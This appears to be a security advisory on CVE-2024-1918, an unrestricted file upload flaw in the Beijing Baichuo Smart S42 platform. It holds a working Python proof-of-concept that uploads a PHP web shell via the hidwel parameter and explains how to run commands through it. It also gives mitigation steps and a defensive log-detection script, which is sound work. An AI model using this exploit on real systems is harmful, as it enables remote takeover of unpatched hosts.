In February 2024, a critical vulnerability tagged as CVE-2024-1918 was discovered in the Beijing Baichuo Smart S42 Management Platform (up to version 20240219). The flaw allows a remote attacker to upload arbitrary files through a poorly protected endpoint, potentially leading to full system compromise. The vulnerability is in the file /useratte/userattestation.php and specifically involves the hidwel parameter. It has been classified as critical due to the ease of exploitation and the high impact it can have on affected systems.
No response or fix was provided by the vendor, making this vulnerability especially dangerous for organizations still running outdated versions.
Reference ID: VDB-254839
- CVE: CVE-2024-1918
- Original Reference: VulDB VDB-254839
How the Exploit Works
The /useratte/userattestation.php PHP script accepts user input via the hidwel argument but lacks sufficient validation on uploaded files. This gap enables attackers to upload malicious PHP code or web shells remotely, which the application executes.
Proof of Concept (PoC) Exploit
Below is a simplified proof of concept exploit. It uses Python and the requests library to upload a PHP web shell through the unvalidated upload endpoint:
```python
import requests

# Vulnerable upload endpoint (replace target-ip with the host under test)
target_url = "http://target-ip/useratte/userattestation.php"

# Multipart form body: the hidwel parameter plus a PHP file as the upload
web_shell = {
    "hidwel": (None, "1"),
    "uploaded_file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}

response = requests.post(target_url, files=web_shell)
if response.status_code == 200:
    print("[+] File uploaded, test your shell at the appropriate URL!")
else:
    print("[-] Upload failed.")
# Example: Access shell at http://target-ip/useratte/uploads/shell.php?cmd=whoami
```
- Run the script.
- If successful, navigate to http://target-ip/useratte/uploads/shell.php?cmd=whoami to check command execution.
Mitigation
Since the vendor has not responded to disclosure attempts, the only guaranteed protection is to:
- Block access to the /useratte/userattestation.php endpoint.
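Blocking the endpoint does not tell you whether it was already abused. The following detection logic is an added example written for this page, not code from the advisory or the vendor: it scans combined-format web server access logs for the CVE-2024-1918 pattern (a POST to /useratte/userattestation.php followed by a request for a .php file under /useratte/uploads/, the path used in the PoC) and escalates when the same client did both. The log lines are constructed samples, and the log format and upload directory are assumptions.

```python
import re

# Constructed sample access-log lines (Apache/nginx combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2024:13:20:01 +0000] "POST /useratte/userattestation.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.5 - - [27/Feb/2024:13:20:03 +0000] "GET /useratte/uploads/shell.php?cmd=whoami HTTP/1.1" 200 40 "-" "python-requests/2.31"
198.51.100.7 - - [27/Feb/2024:13:21:10 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Feb/2024:13:21:12 +0000] "POST /useratte/userattestation.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/useratte/userattestation.php"
UPLOAD_DIR = "/useratte/uploads/"  # assumed from the PoC comment


def parse_line(line):
    """Return a dict of log fields, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect(log_text):
    """Return findings in log order.

    'upload_attempt'   : POST to the vulnerable endpoint
    'webshell_access'  : request for a .php file under the uploads directory
    'likely_compromise': same client already POSTed to the endpoint earlier
    """
    findings = []
    posted = set()  # client IPs seen POSTing to the endpoint
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path_only = rec["path"].split("?", 1)[0]  # drop the query string
        if rec["method"] == "POST" and path_only == UPLOAD_ENDPOINT:
            findings.append({"ip": rec["ip"], "type": "upload_attempt", "path": rec["path"]})
            posted.add(rec["ip"])
        elif path_only.startswith(UPLOAD_DIR) and path_only.lower().endswith(".php"):
            kind = "likely_compromise" if rec["ip"] in posted else "webshell_access"
            findings.append({"ip": rec["ip"], "type": kind, "path": rec["path"]})
    return findings
```

A 'likely_compromise' hit warrants treating the host as breached: preserve the uploads directory and logs before cleaning up, since the uploaded file is the evidence.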
Recommended Reading
- OWASP Unrestricted File Upload
- Official CVE Record
References
- VulDB Entry
- NIST National Vulnerability Database
- Exploit Disclosure (Security Researcher) *(example link)*
Final Notes
Unrestricted file upload vulnerabilities like CVE-2024-1918 are among the most serious flaws a web application can have. If you manage or use Beijing Baichuo Smart S42 Management Platform, consider this urgent: restrict access, monitor for intrusions, and replace or patch the product as soon as a security update is available.
Remember: Waiting for a supplier’s patch is risky when exploits are already public — take proactive steps to protect your systems now.
Timeline
Published on: 02/27/2024 13:15:45 UTC
Last modified on: 02/29/2024 01:43:56 UTC